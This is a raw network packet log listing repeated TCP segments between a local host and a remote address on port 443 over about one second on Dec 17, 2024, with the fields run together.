                                                                                                                                                                              Dec 17, 2024 18:12:31.234451056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.237658978 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.237736940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.237750053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.237797022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.240559101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.240642071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.240655899 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.240700006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.245742083 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.245812893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.245820999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.245868921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.248959064 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.249036074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.249043941 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.249092102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.252371073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.252479076 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.252485991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.252559900 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.256426096 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.256503105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.256510973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.256565094 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.260065079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.260140896 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.260149002 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.260195017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.264079094 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.264189005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.264199018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.264275074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.266947985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.267039061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.267047882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.267097950 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.270534039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.270659924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.270665884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.270745993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.304060936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.304141998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.304150105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.304195881 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.306574106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.306649923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.306655884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.306703091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.741911888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.741926908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.742006063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.742039919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.742095947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.745959044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.746054888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.746079922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.746128082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.749041080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.749135971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.749154091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.749198914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.751140118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.751209974 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.751224041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.751283884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.755461931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.755543947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.755559921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.755608082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.758774042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.758853912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.758871078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.758918047 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.761775017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.761888981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.761907101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.761967897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.764981985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.765062094 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.765079021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.765130043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.768161058 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.768285990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.768301964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.768372059 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.770868063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.771008015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.771022081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.771097898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.774070024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.774194956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.774214029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.774288893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.777643919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.777766943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.777781963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.777858973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.781100035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.781282902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.781316996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.781388998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.784794092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.784872055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.784888983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.784935951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.788835049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.788916111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.788932085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.788976908 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.791867971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.791981936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.791995049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.792067051 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.796392918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.796471119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.796485901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.796533108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.799238920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.799335003 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.799355984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.799401999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.802460909 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.802561045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.802576065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.802619934 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.805860996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.805989027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.806010008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.806078911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.809133053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.809214115 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.809236050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.809282064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.812165022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.812365055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.812397957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.812459946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.815466881 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.815561056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.815572023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.815619946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.818490982 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.818578005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.818587065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.818634033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.822267056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.822354078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.822364092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.822411060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.825493097 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.825573921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.825583935 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.825632095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.827631950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.827713013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.827721119 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.827766895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.831911087 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.831998110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.832007885 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.832052946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.835112095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.835191965 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.835201025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.835247993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.838362932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.838444948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.838453054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.838498116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.841577053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.841675043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.841681957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.841723919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.844387054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.844475031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.844490051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.844531059 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.848566055 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.848673105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.848706007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.848761082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.851725101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.851845980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.851877928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.851955891 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.854924917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.855048895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.855078936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.855150938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.859397888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.859523058 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.859554052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.859618902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.862946033 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.863058090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.863089085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.863173008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.865927935 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.866009951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.866038084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.866085052 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.868665934 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.868782997 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.868812084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.868879080 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.872441053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.872567892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.872596025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.872642040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.875559092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.875641108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.875670910 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.875713110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.878976107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.879101038 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.879129887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.879199028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.882605076 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.882720947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.882750034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.882797956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.885615110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.885696888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.885724068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.885770082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.889169931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.889297962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.889323950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.889401913 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.892425060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.892507076 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.892527103 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.892573118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.896513939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.896600008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.896620035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.896665096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.900262117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.900387049 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.900413036 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.900477886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.995189905 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.995376110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.995414019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.995484114 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.998862982 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.998986006 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:31.999021053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:31.999089956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.001377106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.001496077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.001527071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.001574993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.004640102 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.004766941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.004795074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.004894018 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.008387089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.008503914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.008526087 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.008614063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.011511087 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.011631966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.011651039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.011717081 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.014759064 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.014874935 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.014893055 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.014966011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.018564939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.018687963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.018716097 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.018785000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.021869898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.021984100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.022006035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.022078991 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.024898052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.025007963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.025027990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.025089979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.028820038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.028939962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.028958082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.029019117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.031835079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.031917095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.031934977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.031985044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.035384893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.035501003 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.035518885 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.035588026 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.038445950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.038562059 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.038575888 CET4434973198.142.240.215192.168.2.4
